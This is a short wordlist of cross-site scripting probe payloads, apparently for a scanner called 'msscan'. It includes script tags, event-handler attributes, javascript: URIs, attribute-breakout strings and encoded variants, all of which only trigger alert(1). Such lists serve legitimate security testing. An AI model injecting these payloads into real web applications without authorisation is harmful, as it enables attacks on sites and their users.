# XSS Payloads
<script>alert("msscan")</script>
"><script>alert(1)</script>
'-alert(1)-'
<img src=x onerror=alert(1)>
"><img src=x onerror=alert(1)>
<svg onload=alert(1)>
<svg/onload=alert(1)>
javascript:alert(1)
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
"><svg/onload=alert(1)>
'><img src=x onerror=alert(1)>
</script><script>alert(1)</script>
" onfocus="alert(1)" autofocus="
<a href="javascript:alert(1)">click</a>
<iframe src="javascript:alert(1)">
%3Cscript%3Ealert(1)%3C/script%3E
&lt;script&gt;alert(1)&lt;/script&gt;
